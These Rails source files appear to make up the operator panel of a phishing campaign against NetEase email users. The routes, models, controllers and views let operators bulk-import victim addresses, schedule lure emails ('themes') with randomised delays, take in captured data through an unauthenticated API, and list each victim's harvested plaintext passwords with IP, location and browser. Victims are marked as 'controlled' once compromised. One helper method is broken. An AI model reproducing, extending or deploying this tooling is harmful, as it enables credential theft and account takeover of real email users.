config/routes.rb
Rails.application.routes.draw do
  devise_for :users, only: :omniauth_callback, controllers: { omniauth_callbacks: 'users/omniauth_callbacks' }
  devise_scope :users do
    delete 'users/sign-out', to: 'devise/sessions#destroy', as: :destroy_ruby_session
  end
  authenticate :user, lambda {|u| u.legal?} do
    root to: 'targets#index'
    namespace :admin do
      resources :targets, only: [:index, :show, :edit, :update]
    end
    resources :users
    resources :targets do
      member do
        post :force_deliver
      end
    end
    resources :delivery_schedules, only: [:index, :update]
    resources :themes
    resources :smtp_settings, only: [:edit, :update]
    resources :delivery_logs, only: [:index]
    resources :password_lists, only: [:index]
    resources :broadcasts, only: [:index, :create]
    get '/custom_chart' => 'dashboard#custom_chart'
  end
  require 'sidekiq/web'
  authenticate :user, lambda {|u| u.admin?} do
    mount Sidekiq::Web => '/sidekiq'
  end

  scope(path: '/api/v1/', module: 'api_v1', as: 'v1', defaults: { format: :json }) do
    resources :records, only: :create
    resources :send_themes, only: :create
    resources :details, only: :create
  end
end

app/models/target.rb
class Target < ApplicationRecord

  belongs_to :user
  has_many :records, -> {where.not(password: nil).order(created_at: :desc)}, dependent: :nullify
  has_many :details, -> {where(password: nil).order(created_at: :desc)}, class_name: 'Record', dependent: :nullify

  has_many :target_themeships, dependent: :nullify
  has_many :themes, through: :target_themeships

  # validation
  validates :email, uniqueness: { case_sensitive: false, message: '重複的email' }
  validates :email, presence: { message: 'email不能為空' }
  validates_format_of :email, with: /\A([^@\s]+)@(163\.com|126\.com|yeah\.net|188\.com|vip\.163\.com|vip\.126\.com)\z/i, on: :create, message: '這不是一個網易郵箱'
end

app/controllers/admin/targets_controller.rb
class Admin::TargetsController < ApplicationController
  before_action :authenticate_user!
  before_action :set_target, only: [:edit, :update, :show]
  after_action :verify_authorized

  def index
    authorize [:admin, :target]
    @targets = Target.includes(:user).page(params[:page])
    @targets = @targets.where(user_id: params[:user_id]) if params[:user_id]
    case params[:condition]
      when 'NotControlled'
        @targets = @targets.where.not(control: true)
      when 'Incontrol'
        @targets = @targets.where(control: true)
    end
    @targets = @targets.where('email like ?', "%#{params[:keyword]}%") if params[:keyword]
  end

  def show
    authorize [:admin, @target]
    render 'targets/show'
  end

  def edit
    authorize [:admin, @target]
  end

  def update
    authorize [:admin, @target]
    @target.control = params[:target][:control]
    @target.user_id = params[:target][:user_id]
    @target.save
    redirect_to admin_target_path(@target)
  end

  private

  def set_target
    @target = Target.find(params[:id])
  end
end

app/controllers/targets_controller.rb
class TargetsController < ApplicationController
  before_action :authenticate_user!
  before_action :set_params, only: :create
  before_action :set_target, only: [:edit, :update, :show, :force_deliver]
  before_action :set_targets, only: [:index, :create]
  after_action :verify_authorized

  include TargetsHelper

  def index
    authorize :target
  end

  def new
    authorize :target
  end

  def create
    authorize :target
    @targets_record = []
    @emails.each do |e|
      @targets_record << Target.create(user: @user, email: e)
      Rails.logger.info "User: #{current_user.name} add #{e} to #{@user.name}"
    end
    render :index
  end

  def show
    authorize @target
  end

  def edit
    authorize @target
  end

  def update
    authorize @target
    @target.control = params[:target][:control]
    @target.save
    redirect_to targets_path(targets_filter)
  end

  def force_deliver
    authorize @target
    theme = Theme.find(params[:theme_id])
    # if @target.themes.include?(theme)
    #   flash[:alert] = '不符合強制發送規則，已經發送過了！'
    # els
    if @target.target_themeships.where('created_at >= ?', Time.now - 15.days).count != 0
      flash[:alert] = '不符合強制發送規則，十五天內有發送紀錄。'
    else
      random = Random.rand(0..6)
      flash[:alert] = "#{@target.email}將於#{random}分鐘後發送題材[#{theme.name}]，請勿重複點擊發信。"
      ForceThemeMailerJob.set(wait: random.minutes).perform_later(@target, theme)
    end
    redirect_to targets_path
  end

  private

  def set_target
    @target = Target.find(params[:id])
  end

  def set_params
    @user = User.find(params[:user_id])
    @emails = params[:email_lists].split("\r\n")
  end

  def set_targets
    @targets = current_user.targets
    case params[:condition]
      when 'NotControlled'
        @targets = @targets.where.not(control: true)
      when 'Incontrol'
        @targets = @targets.where(control: true)
    end

    if params[:keyword]
      @targets = @targets.where('email like ?', "%#{params[:keyword]}%")
    end
    @targets = @targets.page(params[:page])
  end
end

app/helpers/admin/targets_helper.rb
module Admin::TargetsHelper
end

app/helpers/targets_helper.rb
module TargetsHelper
  def targets_filter(options={})
    params.permit(:page, :condition, :email_lists, :user_id).merge(options)
  end

  def netease_email?(email)
    email.include?
  end
end

app/views/targets/_new_targets_form.html.erb
<h1>新增資料</h1>
<%= form_tag targets_path, method: :post do %>
    <%= label_tag '選擇使用者' %>
    <%= select_tag :user_id, options_for_select(User.all.collect {|u| [u.name, u.id]}, selected: current_user.id), class: 'form-control' %>
    <%= label_tag '電子郵件清單 斷行分隔' %>
    <%= text_area_tag :email_lists, nil, class: 'form-control' %>
    <%= submit_tag '送出', class: 'btn btn-danger' %>
<% end %>

app/views/targets/_targets_record.html.erb
<h1>Record</h1>
<table class="table table-striped">
  <tr>
    <th>email</th>
    <th>status</th>
    <th>errors?</th>
  </tr>
  <% targets_record.each do |t| %>
      <tr>
        <td><%= t.email %></td>
        <td><%= (t.errors.full_messages.any?) ? '失敗' : '成功' %></td>
        <td>
          <% if t.errors.full_messages.any? %>
              <% t.errors.full_messages.each do |e| %>
                  <%= e %> <br/>
              <% end %>
          <% end %>
        </td>
      </tr>
  <% end %>
</table>

app/views/targets/create.html.erb
<%= render partial: 'targets_record', :locals => { targets_record: @targets_record } %>
<%= link_to '新增其他內容', new_target_path, class: 'btn btn-default' %>

app/views/targets/edit.html.erb
<h3><%= @target.email %></h3>
<%= form_for @target, url: target_path(@target, targets_filter), method: :patch do |f| %>
    <div class="form-group">
      <%= f.label :control, value: true, class: 'radio-inline' do %>
          <%= f.radio_button :control, true %>守控
      <% end %>
    </div>
    <div class="form-group">
      <%= f.label :control, value: false, class: 'radio-inline' do %>
          <%= f.radio_button :control, false %>未守控
      <% end %>
    </div>
    <div class="form-group">
      <%= f.submit :class => 'btn btn-info' %>
    </div>
<% end %>

app/views/targets/index.html.erb
<div class="col-sm-12 col-md-8">
  <h1>List(<%= params[:condition] ? params[:condition] : 'ALL' %>)</h1>
  <div class="btn-group">
    <%= link_to 'ALL', targets_path, :class => 'btn btn-default' %>
    <%= link_to 'NotControlled', targets_path(:condition => 'NotControlled'), :class => 'btn btn-primary' %>
    <%= link_to 'Incontrol', targets_path(:condition => 'Incontrol'), :class => 'btn btn-info' %>
  </div>
  <div class="col-xs-12">
    <%= form_tag targets_path, method: :get do %>
        <%= (hidden_field_tag :condition, params[:condition]) if params[:condition] %>
        <%= label_tag :key_work, 'Key Word' %>
        <%= text_field_tag :keyword %>
        <%= submit_tag '送出', class: 'btn btn-success' %>
    <% end %>
  </div>
  <table class="table table-hover">
    <thead>
    <td>email</td>
    <td>control</td>
    <td>edit</td>
    </thead>
    <tbody>
    <% @targets.each do |t| %>
        <tr>
          <td><%= link_to t.email, target_path(t, targets_filter) %></td>
          <td><%= t.control %></td>
          <td><%= link_to 'edit', edit_target_path(t, targets_filter(page: params[:page])) %></td>
        </tr>
    <% end %>
    </tbody>
  </table>
  <%= paginate @targets %>
</div>
<% if current_user.legal? %>
    <div class="col-sm-12 col-md-4">
      <%= render partial: 'new_targets_form' %>
      <% if @targets_record.present? %>
          <%= render partial: 'targets_record', :locals => { targets_record: @targets_record } %>
      <% end %>
    </div>
<% end %>

app/views/targets/new.html.erb
<%= render partial: 'new_targets_form' %>

app/views/targets/show.html.erb
<div class="col-xs-12">
  <h3><%= @target.email %></h3>
  <h4>belong to <%= @target.user.name %></h4>
  <ul>
    <li>create at:<%= @target.created_at.to_formatted_s(:short) %></li>
  </ul>
</div>
<div class="col-xs-12">
  <h3>Themes</h3>
  <table class="table table-hover">
    <thead>
    <td>Title</td>
    <td>deliver date</td>
    </thead>
    <tbody>
    <% Theme.all.each do |t| %>
      <tr>
        <td><%= t.subject %></td>
        <td>
          <%= @target.target_themeships.find_by_theme_id(t.id).created_at.to_formatted_s(:short) if @target.themes.include?(t) %>
          <%= button_to 'Force Deliver', force_deliver_target_path(@target, theme_id: t.id), class: 'btn btn-danger', data: { confirm: 'Are you sure?' } %>
        </td>
      </tr>
    <% end %>
    </tbody>
  </table>
</div>
<div class="col-xs-12">
  <h3>records</h3>
  <table class="table table-hover">
    <thead>
    <td>ip_address</td>
    <td>browser</td>
    <td>platform</td>
    <td>password</td>
    </thead>
    <tbody>
    <% @target.records.each do |r| %>
      <tr>
        <td><%= r.ip_v4 %>[<%= r.ip_location %>]</td>
        <td><%= r.browser %></td>
        <td><%= r.platform %></td>
        <td><%= r.password %></td>
      </tr>
    <% end %>
    </tbody>
  </table>
</div>
<div class="col-xs-12">
  <h3>Detail</h3>
  <table class="table table-hover">
    <thead>
    <td>ip_address</td>
    <td>browser</td>
    <td>platform</td>
    <td>time</td>
    </thead>
    <tbody>
    <% @target.details.each do |d| %>
      <tr>
        <td><%= d.ip_v4 %>[<%= d.ip_location %>]</td>
        <td><%= d.browser %></td>
        <td><%= d.platform %></td>
        <td><%= d.created_at.to_formatted_s(:short) %></td>
      </tr>
    <% end %>
    </tbody>
  </table>
</div>
<%= link_to '返回清單', targets_path(targets_filter), class: 'btn btn-success' %>
<%= link_to 'Admin清單', admin_targets_path(targets_filter), class: 'btn btn-success' if current_user.manager? %>
<%= link_to '修改', edit_admin_target_path(@target), class: 'btn btn-danger' if current_user.manager? %>